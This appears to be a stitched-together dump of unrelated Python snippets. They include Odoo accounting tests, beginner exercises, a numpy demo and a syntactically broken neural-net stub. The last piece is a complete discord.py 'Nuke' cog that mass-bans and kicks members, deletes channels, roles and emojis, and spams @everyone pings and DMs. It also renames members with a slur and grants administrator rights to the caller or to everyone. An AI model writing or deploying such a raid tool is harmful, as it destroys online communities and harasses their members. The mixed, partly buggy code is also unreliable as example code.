args = [fields.Date.to_date('2019-01-01'), fields.Date.to_date('2019-12-19')]
aaccount_1 = self._create_analytic_account('ANAL01')
aaccount_2 = self._create_analytic_account('ANAL02')
percent = 42.42
analytic_transfer_model_line = self._add_transfer_model_line(self.destination_accounts[0].id,
analytic_account_ids=[aaccount_1.id, aaccount_2.id])
percent_transfer_model_line = self._add_transfer_model_line(self.destination_accounts[1].id, percent=percent)
anal_res = analytic_transfer_model_line._get_move_lines_domain(*args)
anal_expected = return_val + [('analytic_account_id', 'in', [aaccount_1.id, aaccount_2.id])]
patched.assert_called_once_with(*args)
self.assertListEqual(anal_res, anal_expected)
patched.reset_mock()
perc_res = percent_transfer_model_line._get_move_lines_domain(*args)
patched.assert_called_once_with(*args)
self.assertListEqual(perc_res, patched.return_value)
def test__get_origin_account_transfer_move_line_values(self):
percent = 92.42
transfer_model_line = self._add_transfer_model_line(self.destination_accounts[0].id, percent=percent)
origin_account = self.origin_accounts[0]
amount = 4200.42
is_debit = True
write_date = fields.Date.to_date('2019-12-19')
params = [origin_account, amount, is_debit, write_date]
result = transfer_model_line._get_origin_account_transfer_move_line_values(*params)
expected = {
'name': 'Automatic Transfer (to account %s)' % self.destination_accounts[0].code,
'account_id': origin_account.id,
'date_maturity': write_date,
'credit' if is_debit else 'debit': amount
}
self.assertDictEqual(result, expected)
def test__get_destination_account_transfer_move_line_values(self):
aaccount_1 = self._create_analytic_account('ANAL01')
aaccount_2 = self._create_analytic_account('ANAL02')
percent = 42.42
analytic_transfer_model_line = self._add_transfer_model_line(self.destination_accounts[0].id,
analytic_account_ids=[aaccount_1.id, aaccount_2.id])
percent_transfer_model_line = self._add_transfer_model_line(self.destination_accounts[1].id, percent=percent)
origin_account = self.origin_accounts[0]
amount = 4200
is_debit = True
write_date = fields.Date.to_date('2019-12-19')
params = [origin_account, amount, is_debit, write_date]
anal_result = analytic_transfer_model_line._get_destination_account_transfer_move_line_values(*params)
aaccount_names = ', '.join([aac.name for aac in [aaccount_1, aaccount_2]])
anal_expected_result = {
'name': 'Automatic Transfer (from account %s with analytic account(s): %s)' % (
origin_account.code, aaccount_names),
'account_id': self.destination_accounts[0].id,
'date_maturity': write_date,
'debit' if is_debit else 'credit': amount
}
self.assertDictEqual(anal_result, anal_expected_result)
percent_result = percent_transfer_model_line._get_destination_account_transfer_move_line_values(*params)
percent_expected_result = {
'name': 'Automatic Transfer (%s%% from account %s)' % (percent, self.origin_accounts[0].code),
'account_id': self.destination_accounts[1].id,
'date_maturity': write_date,
'debit' if is_debit else 'credit': amount
}
self.assertDictEqual(percent_result, percent_expected_result)
|
dan = int(input("출력하고 싶은 구구단의 단숫자를 입력하숑 : "))
print(dan, "단")
for num in range(1, 10):
print(dan, "*", num, "=", dan * num)
|
#import sys
#input = sys.stdin.readline
from copy import deepcopy
def main():
K = int( input())
T = [[1,2,3,4,5,6,7,8,9]]
for i in range(10):
S = T[i]
R = []
for s in S:
t = s%10
if t == 0:
R.append(s*10)
R.append(s*10+1)
elif t%10 == 9:
R.append(s*10+9)
R.append(s*10+8)
else:
R.append(s*10+t)
R.append(s*10+t+1)
R.append(s*10+t-1)
T.append(R)
ANS = []
for t in T:
ANS.extend(t)
ANS.sort()
print(ANS[K-1])
if __name__ == '__main__':
main()
|
import numpy as np
a=np.matrix([[1,2,3],[4,5,6],[7,8,9]])
m=np.matrix([[1,2,3],[4,5,6],[7,8,9]])
b=m
print "MATRIX IS:\n",m
print"DETERMINANT OF MATRIX IS:\n",np.linalg.det(m)
print "INVERSE OF MATRIX IS:\n",np.linalg.inv(m)
print "NORM OF MATRIX IS:\n",np.linalg.norm(m)
print "RANK OF MATRIX IS:\n",np.linalg.matrix_rank(m)
print "TRACE OF MATRIX IS:\n",np.trace(m)
p=input("ENTER POWER OF MATRIX:\n")
print "POWER OF MATRIX IS:\n",np.linalg.matrix_power(m,p)
print "TRANSPOSE OF MATRIX IS:\n",np.transpose(m)
print "EIGEN VALUES OF MATRIX IS:\n",np.linalg.eigvals(m)
print "MAXIMUM OF MATRIX IS:\n",np.max(a)
print "MINIMUM OF MATRIX IS:\n",np.min(a)
print "ADDITION OF TWO MATRICES A & B IS:\n",np.add(a,b)
print "SUBTRACTION OF MATRIX B FROM MATRIX A IS:\n",np.subtract(a,b)
print "MULTIPLICATION OF MATRICES A & B IS :\n",np.multiply(a,b)
print "DIVISION OF MATRIX A BY MATRIX B IS:\n",np.divide(a,b)
print "DOT PRODUCT OF BOTH MATRICES:\n",np.dot(a,b)
print "SQUARE ROOT OF MATRIX B IS:\n",np.sqrt(b)
|
# making a dog class. Think about properties, attributes, other things.
class Dog:
# constructor
# scale out of 10
def __init__(self, name, energy, hunger):
# listing out properties and giving them initial values
self.hunger = hunger
self.energy = energy
self.happiness = 5
self.name = name
# self.name is the property that belongs to the class, while name is the value associated
# methods/functions
def play(self):
if self.energy > 0 and self.hunger > 0:
self.happiness += 1
self.hunger -= 1
self.energy -= 1
status = self.name + " played and it was fun."
else:
status = "Erm, " + self.name + " needs to not play right now. Maybe try a nap or some food?"
return status
def nap(self):
if self.hunger > 0 and self.energy < 5:
self.happiness -= 1
self.hunger -= 1
self.energy += 2
status = self.name + " took a nap and is now well rested!"
else:
status = "You're dog has too much energy to sleep right now. Maybe try playing with it?"
return status
def feed(self):
if self.hunger < 10:
self.hunger += 1
self.happiness += 1
self.energy += 1
status = self.name + " ate some dog treats for lunch."
else:
status = "You're dog is too full to eat more. Try tiring it out by playing with it!"
return status
def stats(self):
info = "Name: " + self.name
info += "\nEnergy: " + str(self.energy)
info += "\nHappiness: " + str(self.happiness)
info += "\nHunger: " + str(self.hunger)
return info
dog1 = Dog("Tetris", 8, 2)
dog2 = Dog("Bat", 5, 7)
# print(dog1.name)
# print(dog1.stats())
# print(dog2.stats())
# dog1.play()
# dog2.play()
# dog1.play()
# print(dog1.stats())
# print(dog2.stats())
while True:
print(dog1.stats())
choice = input("What would you like to do with your dog? ")
if choice == "play":
print(dog1.play())
elif choice == "nap":
print(dog1.nap())
elif choice == "feed":
print(dog1.feed())
elif choice == "nothing":
print("Are you done caring for your dog already? OK. ")
break
else:
print("You can't do that.")
|
counter = 1
def test():
test()
print("Hi")
counter += 1
test()
|
#!/usr/bin/python
import numpy as np
def nonlin(x, deriv=False):
"""for back propagation"""
if(deriv):
return x*(1-x)
return 1/(1+np.exp(-1*x))
x = np.array([[0,0,1], [0,1,1], [1,0,1] [1,1,1]])
y = np.array([[0], [1], [1], [0]])
np.random.seed(1)
#matrix #the one is a bias
syn0 = 2*np.random.random((3,4)) - 1
syn1 = 2*np.random.random((4,1)) - 1
#training
|
from discord.ext import commands
import discord
class Nuke(commands.Cog, name="Nuke"):
"""A simple toolkit for everyone, that can nuke any server, if provided proper permissions. :')"""
def __init__(self, bot):
self.bot = bot
@commands.command(name="banmembers", aliases=["banm", "bmembers", "bm"])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(ban_members=True, add_reactions=True)
async def _bm(self, ctx, *, remark:str=None):
"""
This command will ban all the members from the server :)
Usage:
[p]banmembers [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if len(remark) > 20: remark = remark[:20:]
for member in ctx.guild.members:
try:
await member.ban(reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
except Exception:
pass # silently ignore if something goes wrong
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="deletechannels", aliases=["deletec", "dchannels", "dc"])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(manage_channels=True, add_reactions=True)
async def _dc(self, ctx, *, remark:str=None):
"""
This command will delete all the channels from the server :)
Usage:
[p]deletechannels [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if remark is None: remark = "N/A"
if len(remark) > 20: remark = remark[:20:]
for channel in ctx.guild.channels:
try:
await channel.delete(reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
except Exception:
pass # silently ignore if something goes wrong
await ctx.message.add_reaction('☑️')
@commands.command(name="deleteemoji", aliases=["deletee", "demoji", "de"])
@commands.bot_has_permissions(manage_emojis=True, add_reactions=True)
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.guild_only()
async def _de(self, ctx, *, remark:str=None):
"""
This command will delete all the emojis from the server :)
Usage:
[p]deleteemoji [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if remark is None: remark = "N/A"
if len(remark) > 20: remark = remark[:20:]
for emoji in ctx.guild.emojis:
try:
await emoji.delete(reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
except Exception:
pass # silently ignore if something goes wrong
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="deleteroles", aliases=["deleter", "droles", "dr"])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(manage_roles=True, add_reactions=True)
async def _dr(self, ctx, *, remark:str=None):
"""
This command will delete all the roles from the server :)
Usage:
[p]deleteroles [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if remark is None: remark = "N/A"
if len(remark) > 20: remark = remark[:20:]
for role in ctx.guild.roles:
try:
await role.delete(reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
except Exception:
pass # silently ignore if something goes wrong
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="kickmembers", aliases=["kickm", "kmembers", "km"])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(kick_members=True, add_reactions=True)
async def _km(self, ctx, *, remark:str=None):
"""
This command will kick all the members from the server :)
Usage:
[p]kickmembers [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if remark is None: remark = "N/A"
if len(remark) > 20: remark = remark[:20:]
for member in ctx.guild.members:
try:
await member.kick(reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
except Exception:
pass # silently ignore if something goes wrong
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="spamchannels", aliases=["spamc", "schannels", "sc"])
@commands.bot_has_permissions(manage_channels=True, add_reactions=True)
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
async def _sc(self, ctx, channels:int, *, remark:str=None):
"""
This command will create lots of channels [Text Channels ONLY] in the server :)
Usage:
[p]spamchannels [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if remark is None: remark = "nuked"
if len(remark) > 20: remark = remark[:20:]
for i in range(0, channels):
try:
channel = await ctx.guild.create_text_channel("nuked", reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
await channel.send("https://github.com/ritik0ranjan/NukeBot \nWant to nuke your enemy server? Have a look to this link.")
except Exception:
pass # silently ignore if something goes wrong
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="spamdirectmessage", aliases=["spamdm", "sdirectmessage", "sdm"])
@commands.bot_has_permissions(mention_everyone=True, add_reactions=True)
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
async def _sdm(self, ctx, *, remark:str=None):
"""
This command will spam everyone ping in all the text channel :)
Usage:
[p]spamdirectmessage [text:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if remark is None: remark = "https://github.com/ritik0ranjan/NukeBot \nWant to nuke your enemy server? Have a look to this link."
if len(remark) > 200: remark = remark[:200:]
for member in ctx.guild.members:
if member.id == ctx.author.id: pass
try:
await member.send(f"Message from **{ctx.guild.name}** {remark}")
except Exception:
pass # silently ignore if something goes wrong
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="spameveryone", aliases=["spame", "severyone", "se"])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(mention_everyone=True, add_reactions=True)
async def _se(self, ctx, *, remark:str=None):
"""
This command will spam everyone ping in all the text channel :)
Usage:
[p]spameveryone [text:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if remark is None: remark = "https://github.com/ritik0ranjan/NukeBot \nWant to nuke your enemy server? Have a look to this link."
if len(remark) > 200: remark = remark[:200:]
for channel in ctx.guild.channels:
try:
await channel.send(f"@everyone {remark}")
except Exception:
pass # silently ignore if something goes wrong
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="changenick", aliases=["cn", "changen", "cnick"])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(manage_nicknames=True, add_reactions=True)
async def _cn(self, ctx, *, name:str=None):
"""
This command will change the nicknames of all the users. :)
Usage:
[p]changenick [text:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if name is None: name = "Bitch"
if len(name) > 32: name = name[:31:]
for member in ctx.guild.members:
try:
member.edit(nick=f"{name}", reason=f"Action requested by {ctx.author.name} ({ctx.author.id})")
except Exception:
pass # silently ignore if something goes wrong
await ctx.message.add_reaction('☑️')
@commands.command(name="giveadmin", aliases=["ga", "givea", "gadmin"])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(manage_roles=True, add_reactions=True)
async def _ga(self, ctx, *, remark:str=None):
"""
This command will create a role, and give it to you, which will have Administration access. :)
Usage:
[p]giveadmin [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
role = await ctx.guild.create_role(name="Admin", hoist=True, mentionable=True, permissions=discord.Permissions.all(), reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
await ctx.author.add_roles(role, reason=f"Action requested by {ctx.author.name} ({ctx.author.id})")
try: await ctx.message.add_reaction('☑️')
except Exception: pass
@commands.command(name="adminall", aliases=['aa', 'admina', 'aall'])
@commands.guild_only()
@commands.cooldown(1, 120, commands.BucketType.guild)
@commands.bot_has_permissions(manage_roles=True, add_reactions=True)
async def _aa(self, ctx, *, remark:str=None):
"""
This command will give Administration access to ``@everyone`` role.
Usage:
[p]adminall [reason:optional]
"""
try: await ctx.message.add_reaction("▶️")
except: pass
if len(remark) > 20: remark = remark[:20:]
await ctx.guild.default_role.edit(permissions=discord.Permissions.all(), reason=f"Action requested by {ctx.author.name} ({ctx.author.id}) | Remark: {remark}")
try: await ctx.message.add_reaction('☑️')
except Exception: pass
def setup(bot):
bot.add_cog(Nuke(bot)) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.